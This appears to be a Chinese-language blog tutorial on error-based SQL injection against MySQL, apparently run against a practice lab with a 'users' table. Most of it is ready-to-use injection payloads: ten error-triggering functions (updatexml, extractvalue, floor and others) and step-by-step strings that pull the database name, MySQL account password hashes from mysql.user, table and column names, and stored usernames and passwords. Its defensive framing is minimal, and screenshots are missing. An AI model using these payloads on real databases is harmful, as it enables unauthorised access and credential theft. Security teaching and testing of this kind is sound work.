当前位置: 首页 > news >正文

【网络安全】SQL注入--报错注入

news 2025/7/28 0:13:44

报错注入

    • 报错注入定义
    • 代码展示
    • 常用的报错语句
      • 1.获取数据库名称
      • 2.获取mysql账号密码
      • 3.获取表名
      • 4.获取字段名
      • 5.获取账号密码

报错注入定义

报错注入:利用sql语句的不规范,获取相关sql提示信息

代码展示

在这里插入图片描述

常用的报错语句

select first_name, last_name FROM users where user_id = ‘1’ and info() –
#获取当前使用的库
1’ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) – 或version() 、database()
#获取数据库敏感信息
1.floor()
select * from test where id=1 and (select 1 from (select
count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by
x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select *
from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select
user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select
user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select
user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select
user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

1.获取数据库名称

1' and info() --

在这里插入图片描述

2.获取mysql账号密码

1' and updatexml(1,concat(0x7e,(select (select authentication_string from mysql.user limit 1 )),0x7e),1) -- 
1' and updatexml(1,concat(0x7e,(select (substring((select authentication_string from mysql.user limit 1),32,40))),0x7e),1) --

因为一条只能显示32字符,所以两段拼接则为mysql密码
在这里插入图片描述
在这里插入图片描述

3.获取表名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

在这里插入图片描述

4.获取字段名

1'and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

在这里插入图片描述
借助burpsuite

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

5.获取账号密码

1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,user,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

在这里插入图片描述

http://www.lryc.cn/news/55821.html

相关文章:

  • APP隐私整改建议
  • MySQL数据模型 and 通用语法 and 分类
  • 一款识别域名是否使用cdn的工具cdnChecker
  • Ant Design Vue的汉化
  • spring cloud中实现接口广播请求到服务提供者
  • 电机PID参数调节笔记
  • 【深度学习】基于华为MindSpore的手写体图像识别实验
  • Linux:内核调试之内核魔术键sysrq
  • Python import导包快速入门
  • ChatGPT这么火,我们能怎么办?
  • HashMap底层原理
  • 卡顿优化小结
  • springboot前端ajax 04 关于后台传的时间和状态在前端的转换
  • 解决Windows微信和 PowerToys 的键盘管理器冲突
  • 组会时间的工作
  • linux udp bind 返回值-1分析
  • Hexo搭建博客
  • Lesson11:http协议
  • 计算机信息安全有哪些SCI期刊推荐? - 易智编译EaseEditing
  • CNVD-2023-12632 泛微e-cology9 sql注入 附poc
  • 赛宁网安合作伙伴大会成功举办,重磅发布SCBaaS服务!
  • R语言 4.2.2安装包下载及安装教程
  • 快速玩转 CNStack 2.0 流量防护
  • 你还在用原生 poi 处理 excel?太麻烦了来瞧瞧这个
  • No.027<软考>《(高项)备考大全》【第11章】项目风险管理
  • mit6.824 lab2c-数据持久化
  • leaflet使用L.geoJSON加载文件,参数filter的使用方法(127)
  • 23年5月高项学习笔记7—— 质量管理
  • 学编程需要哪些基础呢?一起来看看吧
  • PECS In Java泛型类型通配符限定之<? extends T>与<? super T>